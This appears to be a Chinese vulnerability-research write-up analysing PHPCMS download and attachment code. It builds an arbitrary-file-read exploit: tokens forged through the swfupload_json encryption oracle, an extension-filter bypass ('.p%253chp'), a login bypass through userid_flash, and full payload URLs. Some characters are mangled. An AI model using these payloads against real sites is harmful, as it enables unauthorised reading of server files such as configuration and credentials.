showmessage(L('illegal_parameters'));\n unset($i,$m,$f);\n $a_k = safe_replace($a_k);\/\/\u5173\u952e\u70b92\n parse_str($a_k);\/\/\u5173\u952e\u70b93\n if(isset($i)) $i = $id = intval($i);\n if(!isset($m)) showmessage(L('illegal_parameters'));\n if(!isset($modelid)||!isset($catid)) showmessage(L('illegal_parameters'));\n if(empty($f)) showmessage(L('url_invalid'));\n $allow_visitor = 1;\n $id = intval($id);\n $modelid = intval($modelid);\n $catid = intval($catid);\n ......\n if(preg_match('\/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(.|$)\/i',$f) || strpos($f, \":\\\")!==FALSE || strpos($f,'..')!==FALSE) showmessage(L('url_error'));\/\/\u5173\u952e\u70b94\n if(strpos($f, 'http:\/\/') !== FALSE || strpos($f, 'ftp:\/\/') !== FALSE || strpos($f, ':\/\/') === FALSE) {\n $pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT'].'down');\n $a_k = urlencode(sys_auth(\"i=$i&d=$d&s=$s&t=\".SYS_TIME.\"&ip=\".ip().\"&m=\".$m.\"&f=$f&modelid=\".$modelid, 'ENCODE', $pc_auth_key));\/\/\u5173\u952e\u70b95\n $downurl = '?m=content&c=down&a=download&a_k='.$a_k;\n } else {\n $downurl = $f; \n }\n}<\/pre>\n public function download() {\n $a_k = trim($_GET['a_k']);\n $pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT'].'down');\/\/\u5173\u952e\u70b96\n $a_k = sys_auth($a_k, 'DECODE', $pc_auth_key);\n if(empty($a_k)) showmessage(L('illegal_parameters'));\n unset($i,$m,$f,$t,$ip);\n $a_k = safe_replace($a_k);\/\/\u5173\u952e\u70b97\n parse_str($a_k);\/\/\u5173\u952e\u70b98\n if(isset($i)) $downid = intval($i);\n if(!isset($m)) showmessage(L('illegal_parameters'));\n if(!isset($modelid)) showmessage(L('illegal_parameters'));\n if(empty($f)) showmessage(L('url_invalid'));\n if(!$i || $m<0) showmessage(L('illegal_parameters'));\n if(!isset($t)) showmessage(L('illegal_parameters'));\n if(!isset($ip)) showmessage(L('illegal_parameters'));\n $starttime = intval($t);\n if(preg_match('\/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(.|$)\/i',$f) || strpos($f, \":\\\")!==FALSE || strpos($f,'..')!==FALSE) showmessage(L('url_error'));\/\/\u5173\u952e\u70b99\n $fileurl = trim($f);\n if(!$downid || empty($fileurl) || !preg_match(\"\/[0-9]{10}\/\", $starttime) || !preg_match(\"\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}\/\", $ip) || $ip != ip()) showmessage(L('illegal_parameters')); \n $endtime = SYS_TIME - $starttime;\n if($endtime > 3600) showmessage(L('url_invalid'));\n if($m) $fileurl = trim($s).trim($fileurl);\/\/\u5173\u952e\u70b910\n if(preg_match('\/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(.|$)\/i',$fileurl) ) showmessage(L('url_error'));\/\/\u5173\u952e\u70b911\n \/\/\u8fdc\u7a0b\u6587\u4ef6\n if(strpos($fileurl, ':\/') && (strpos($fileurl, pc_base::load_config('system','upload_url')) === false)) { \/\/\u5173\u952e\u70b912\n header(\"Location: $fileurl\");\n } else {\n if($d == 0) {\n header(\"Location: \".$fileurl);\/\/\u5173\u952e\u70b913\n } else {\n $fileurl = str_replace(array(pc_base::load_config('system','upload_url'),'\/'), array(pc_base::load_config('system','upload_path'),DIRECTORY_SEPARATOR), $fileurl);\n $filename = basename($fileurl);\/\/\u5173\u952e\u70b914\n \/\/\u5904\u7406\u4e2d\u6587\u6587\u4ef6\n if(preg_match(\"\/^([sS]*?)([\ufffd-\ufffd][@-\ufffd])([sS]*?)\/\", $fileurl)) {\n $filename = str_replace(array(\"%5C\", \"%2F\", \"%3A\"), array(\"\\\", \"\/\", \":\"), urlencode($fileurl));\n $filename = urldecode(basename($filename));\/\/\u5173\u952e\u70b915\n }\n $ext = fileext($filename);\/\/\u5173\u952e\u70b916\n $filename = date('Ymd_his').random(3).'.'.$ext;\n $fileurl = str_replace(array('<','>'), '',$fileurl);\/\/\u5173\u952e\u70b917\n file_down($fileurl, $filename);\/\/\u5173\u952e\u70b918\n }\n }\n }<\/pre>\nfunction safe_replace($string) {\n $string = str_replace('%20','',$string);\n $string = str_replace('%27','',$string);\n $string = str_replace('%2527','',$string);\n $string = str_replace('*','',$string);\n $string = str_replace('\"','\"',$string);\n $string = str_replace(\"'\",'',$string);\n $string = str_replace('\"','',$string);\n $string = str_replace(';','',$string);\n $string = str_replace('<','<',$string);\n $string = str_replace('>','>',$string);\n $string = str_replace(\"{\",'',$string);\n $string = str_replace('}','',$string);\n $string = str_replace('\\','',$string);\n return $string;\n}<\/pre>\n1.2 content\/down\u6a21\u5757\u5927\u81f4\u6d41\u7a0b\u5206\u6790<\/h4>\n
\n
\n
function file_down($filepath, $filename = '') {\n if(!$filename) $filename = basename($filepath);\n if(is_ie()) $filename = rawurlencode($filename);\n $filetype = fileext($filename);\n $filesize = sprintf(\"%u\", filesize($filepath));\n if(ob_get_length() !== false) @ob_end_clean();\n header('Pragma: public');\n header('Last-Modified: '.gmdate('D, d M Y H:i:s') . ' GMT');\n header('Cache-Control: no-store, no-cache, must-revalidate');\n header('Cache-Control: pre-check=0, post-check=0, max-age=0');\n header('Content-Transfer-Encoding: binary');\n header('Content-Encoding: none');\n header('Content-type: '.$filetype);\n header('Content-Disposition: attachment; filename=\"'.$filename.'\"');\n header('Content-length: '.$filesize);\n readfile($filepath);\n exit;\n}<\/pre>\n1.2.1$fileurl\u53d8\u91cf\u6784\u9020\u5206\u6790<\/h4>\n
$fileurl = str_replace(array('<','>'), '',$fileurl);\/\/\u5173\u952e\u70b917<\/pre>\nif($m) $fileurl = trim($s).trim($fileurl);\/\/\u5173\u952e\u70b910<\/pre>\n
$fileurl = trim($f);<\/pre>\n
$a_k = safe_replace($a_k);\/\/\u5173\u952e\u70b97\nparse_str($a_k);\/\/\u5173\u952e\u70b98<\/pre>\n
1.2.2$a_k\u53d8\u91cf\u5206\u6790<\/h4>\n
$pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT'].'down');\/\/\u5173\u952e\u70b96\n $a_k = sys_auth($a_k, 'DECODE', $pc_auth_key);<\/pre>\n $a_k = trim($_GET['a_k']);\n if(!isset($a_k)) showmessage(L('illegal_parameters'));\n $a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));\/\/\u5173\u952e\u70b91<\/pre>\n1.2.3\u5c0f\u7ed3<\/h4>\n
2.\u6f0f\u6d1e\u6316\u6398\u8fc7\u7a0b<\/h2>\n
2.1 init\u65b9\u6cd5\u6240\u63a5\u53d7\u7684$a_k\u6784\u9020<\/h3>\n
2.1.1\u63a2\u7d22\u6b63\u5e38\u6d41\u7a0b\u4e2d\u7684$a_k\u6784\u9020\u8fc7\u7a0b<\/h4>\n
function downfile($field, $value) {\n extract(string2array($this->fields[$field]['setting']));\n $list_str = array();\n if($value){\n $value_arr = explode('|',$value);\n $fileurl = $value_arr['0'];\n if($fileurl) {\n $sel_server = $value_arr['1'] ? explode(',',$value_arr['1']) : '';\n $server_list = getcache('downservers','commons');\n if(is_array($server_list)) {\n foreach($server_list as $_k=>$_v) {\n if($value && is_array($sel_server) && in_array($_k,$sel_server)) {\n $downloadurl = $_v[siteurl].$fileurl;\n if($downloadlink) {\n $a_k = urlencode(sys_auth(\"i=$this->id&s=$_v[siteurl]&m=1&f=$fileurl&d=$downloadtype&modelid=$this->modelid&catid=$this->catid\", 'ENCODE', pc_base::load_config('system','auth_key')));\n $list_str[] = \"<a href='\".APP_PATH.\"index.php?m=content&c=down&a_k={$a_k}' target='_blank'>{$_v[sitename]}<\/a>\";\n } else {\n $list_str[] = \"<a href='{$downloadurl}' target='_blank'>{$_v[sitename]}<\/a>\";\n }\n }\n }\n } \n return $list_str;\n }\n } \n }<\/pre>\n2.1.2 \u9ed1\u79d1\u6280\u6784\u9020$a_k<\/h4>\n
\n
public static function set_cookie($var, $value = '', $time = 0) {\n $time = $time > 0 ? $time : ($value == '' ? SYS_TIME - 3600 : 0);\n $s = $_SERVER['SERVER_PORT'] == '443' ? 1 : 0;\n $var = pc_base::load_config('system','cookie_pre').$var;\n $_COOKIE[$var] = $value;\n if (is_array($value)) {\n foreach($value as $k=>$v) {\n setcookie($var.'['.$k.']', sys_auth($v, 'ENCODE'), $time, pc_base::load_config('system','cookie_path'), pc_base::load_config('system','cookie_domain'), $s);\n }\n } else {\n setcookie($var, sys_auth($value, 'ENCODE'), $time, pc_base::load_config('system','cookie_path'), pc_base::load_config('system','cookie_domain'), $s);\n }\n }\n\n public static function get_cookie($var, $default = '') {\n $var = pc_base::load_config('system','cookie_pre').$var;\n return isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'DECODE') : $default;\n }<\/pre>\n\n
public function swfupload_json() {\n $arr['aid'] = intval($_GET['aid']);\n $arr['src'] = safe_replace(trim($_GET['src']));\n $arr['filename'] = urlencode(safe_replace($_GET['filename']));\n $json_str = json_encode($arr);\n $att_arr_exist = param::get_cookie('att_json');\n $att_arr_exist_tmp = explode('||', $att_arr_exist);\n if(is_array($att_arr_exist_tmp) && in_array($json_str, $att_arr_exist_tmp)) {\n return true;\n } else {\n $json_str = $att_arr_exist ? $att_arr_exist.'||'.$json_str : $json_str;\n param::set_cookie('att_json',$json_str);\n return true; \n }\n }<\/pre>\nindex.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=fobnn<\/pre>\n
{\"aid\":888,\"src\":\"fobnn\",\"filename\":\"\"}<\/pre>\n1a66LXDASYtpYw9EH6xoXQTpeTKxX6z0L0kRQ7_lX9bekmdtq1XCYmMMso3m9vDf5eS6xY3RjvuLaHkK15rH-CJz<\/pre>\n
index.php?m=content&c=down&a=init\n&a_k=1a66LXDASYtpYw9EH6xoXQTpeTKxX6z0L0kRQ7_lX9bekmdtq1XCYmMMso3m9vDf5eS6xY3RjvuLaHkK15rH-CJz<\/pre>\n
2.2 json\u548cparse_str<\/h3>\n
{\"aid\":888,\"src\":\"fobnn=q&p1=12312\",\"filename\":\"\"}<\/pre>\n{\"aid\":888,\"src\":\"pad=x&fobnn=q&p1=12312&pade=\",\"filename\":\"\"}<\/pre>\n2.3 \u6784\u9020\u7b26\u5408init\u65b9\u6cd5\u7684$a_k<\/h3>\n
if(isset($i)) $i = $id = intval($i);\n if(!isset($m)) showmessage(L('illegal_parameters'));\n if(!isset($modelid)||!isset($catid)) showmessage(L('illegal_parameters'));\n if(empty($f)) showmessage(L('url_invalid'));\n $allow_visitor = 1;\n $id = intval($id);\n $modelid = intval($modelid);\n $catid = intval($catid);<\/pre>\nindex.php?m=attachment&c=attachments&a=swfupload_json&aid=1\n src=pad%3dx%26i%3d1%26modelid%3d1%26m%3d1%26catid%3d1%26f%3dfobnn%26pade%3d<\/pre>\n
3d3fR3g157HoC3wGNEqOLyxVCtvXf95VboTXfCLzq4bBx7j0lHB7c6URWBYzG8alWDrqP4mZb761B1_zsod-adgB2jKS4UVDbknVgyfP8C8VP-EMqKONVbY6aNH4ffWuuYbrufucsVsmJQ\n{\"aid\":1,\"src\":\"pad=x&i=1&modelid=1&m=1&catid=1&f=fobnn&pade=\",\"filename\":\"\"}<\/pre>\nindex.php?m=content&c=down&a=init\n&a_k=3d3fR3g157HoC3wGNEqOLyxVCtvXf95VboTXfCLzq4bBx7j0lHB7c6URWBYzG8alWDrqP4mZb761B1_zsod-adgB2jKS4UVDbknVgyfP8C8VP-EMqKONVbY6aNH4ffWuuYbrufucsVsmJQ<\/pre>\n
<\/head>\n<body>\n <style type=\"text\/css\">\n body, html{ background:#FFF!important;}\n <\/style>\n <a href=\"?m=content&c=down&a=download&a_k=a602eCW5tkuTZTtvLeYrcU0kSTKdCLFcNAQ06GE74c9zc6NMUaHAss9zwCa-glxRmBtylSbtrxMNTxy5knsFrZIeC_iCRmj3pTSuQxTHxps3qs4U6pKLIz4y3A\" class=\"xzs_btn\"><\/a>\n <\/body>\n<\/html><\/pre>\n2.4\u7ed5\u8fc7\u9650\u5236\u6784\u9020\u6700\u7ec8payload<\/h3>\n
if(preg_match('\/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(.|$)\/i',$f) || strpos($f, \":\\\")!==FALSE || strpos($f,'..')!==FALSE) showmessage(L('url_error'));\nif(strpos($f, 'http:\/\/') !== FALSE || strpos($f, 'ftp:\/\/') !== FALSE || strpos($f, ':\/\/') === FALSE) {\n $pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT'].'down');\n $a_k = urlencode(sys_auth(\"i=$i&d=$d&s=$s&t=\".SYS_TIME.\"&ip=\".ip().\"&m=\".$m.\"&f=$f&modelid=\".$modelid, 'ENCODE', $pc_auth_key));\n $downurl = '?m=content&c=down&a=download&a_k='.$a_k;\n } else {\n $downurl = $f; \n }<\/pre>\nif($m) $fileurl = trim($s).trim($fileurl);\/\/\u5173\u952e\u70b910<\/pre>\n
\/\/\u5e38\u89c4\u68c0\u6d4b\u4ee3\u7801\u5c31\u4e0d\u8d34\u4e86\uff0c$i,$t,$m,$modelid,$t,$ip\u7684\u68c0\u6d4b\u3002\nif(preg_match('\/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(.|$)\/i',$f) || strpos($f, \":\\\")!==FALSE || strpos($f,'..')!==FALSE) showmessage(L('url_error'));\n $fileurl = trim($f);<\/pre>\nif($m) $fileurl = trim($s).trim($fileurl);\nif(preg_match('\/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(.|$)\/i',$fileurl) ) showmessage(L('url_error'));\n \/\/\u8fdc\u7a0b\u6587\u4ef6<\/pre>\n$fileurl = str_replace(array('<','>'), '',$fileurl);\/\/\u5173\u952e\u70b917<\/pre>\nif($d == 0) {\n header(\"Location: \".$fileurl);<\/pre>\n2.4.1 urlencode\u7f16\u7801\u201c\u201d<\/h4>\n
2.4.2\u6700\u7ec8payload<\/h3>\n
pad=x&i=1&modelid=1&catid=1&d=1&m=1&f=.p%253chp&s=index&pade=\nindex.php?m=attachment&c=attachments&a=swfupload_json&aid=1\n &src=pad%3dx%26i%3d1%26modelid%3d1%26catid%3d1%26d%3d1%26m%3d1%26f%3d.p%25253chp%26s%3dindex%26pade%3d<\/pre>\n
8862Fewa0VoDAmDaEWXtUnQ817naJmAG9DYlUPmB8QpBl8Fi91_XvW8ngzKBGBJkxn8Ms-sHcBkGNtosnd_ZjshNlyQvOrC2ZFMSPubno6rDiuALAVAcchHVRGTtNRYMAiwMTIJ4OVMmgPwjbu1I0FLmurCLMFAWeyQ\n{\"aid\":1,\"src\":\"pad=x&i=1&modelid=1&catid=1&d=1&m=1&f=.p%253chp&s=index&pade=\",\"filename\":\"\"}<\/pre>\nindex.php?m=content&c=down&a=init&a_k=8862Fewa0VoDAmDaEWXtUnQ817naJmAG9DYlUPmB8QpBl8Fi91_XvW8ngzKBGBJkxn8Ms-sHcBkGNtosnd_ZjshNlyQvOrC2ZFMSPubno6rDiuALAVAcchHVRGTtNRYMAiwMTIJ4OVMmgPwjbu1I0FLmurCLMFAWeyQ<\/pre>\n
index.php?m=content&c=down&a=download&a_k=e5586zx1k-uH8PRhk2ZfPApV5cxalMnAJy46MpO8iy7DgyxWqwZHqFVpQJTxDmmUJxrF0gx_WRIv-iSKq2Z8YEWc-LRXIrr9EgT-pAEJtGGBUcVCOoI3WlMdxajPdFuIqpsY<\/pre>\n
2.5\u7ed5\u8fc7attachment\u6a21\u5757\u6743\u9650\u9650\u5236\u5b8c\u6210\u65e0\u9650\u5236\u5229\u7528<\/h3>\n
class attachments {\n private $att_db;\n function __construct() {\n pc_base::load_app_func('global');\n $this->upload_url = pc_base::load_config('system','upload_url');\n $this->upload_path = pc_base::load_config('system','upload_path'); \n $this->imgext = array('jpg','gif','png','bmp','jpeg');\n $this->userid = $_SESSION['userid'] ? $_SESSION['userid'] : (param::get_cookie('_userid') ? param::get_cookie('_userid') : sys_auth($_POST['userid_flash'],'DECODE'));\n $this->isadmin = $this->admin_username = $_SESSION['roleid'] ? 1 : 0;\n $this->groupid = param::get_cookie('_groupid') ? param::get_cookie('_groupid') : 8;\n \/\/\u5224\u65ad\u662f\u5426\u767b\u5f55\n if(empty($this->userid)){\n showmessage(L('please_login','','member'));\n }\n }<\/pre>\nsys_auth($_POST['userid_flash'],'DECODE')<\/pre>\n
pc_base::load_sys_class('format', '', 0);\nclass index {\n function __construct() { \n $this->db = pc_base::load_model('content_model');\n $this->siteid = isset($_GET['siteid']) && (intval($_GET['siteid']) > 0) ? intval(trim($_GET['siteid'])) : (param::get_cookie('siteid') ? param::get_cookie('siteid') : 1);\n param::set_cookie('siteid',$this->siteid); \n $this->wap_site = getcache('wap_site','wap');\n $this->types = getcache('wap_type','wap');\n $this->wap = $this->wap_site[$this->siteid];\n define('WAP_SITEURL', $this->wap['domain'] ? $this->wap['domain'].'index.php?' : APP_PATH.'index.php?m=wap&siteid='.$this->siteid);\n if($this->wap['status']!=1) exit(L('wap_close_status'));\n }<\/pre>\n3.EXP\u7f16\u5199<\/h2>\n
\n
&src=\u60f3\u8981\u8bfb\u53d6\u6587\u4ef6\u7684payload\uff0c\u5e76\u4e14\u8bbf\u95ee\u7684\u65f6\u5019\u8bbe\u7f6epost\u5b57\u6bb5userid_flash\u4e3a\u6b65\u9aa4\u4e00\u83b7\u53d6\u7684cookie.<\/pre>\n
\n
\n
4.\u4fee\u590d\u65b9\u6848<\/h2>\n